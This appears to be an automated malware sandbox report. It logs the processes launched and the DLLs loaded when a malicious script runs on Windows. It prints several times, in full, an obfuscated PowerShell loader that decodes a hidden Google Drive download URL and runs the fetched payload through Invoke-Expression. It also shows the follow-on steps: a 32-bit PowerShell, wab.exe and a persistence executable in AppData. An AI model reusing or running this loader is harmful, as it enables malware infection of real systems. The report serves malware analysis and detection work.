            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
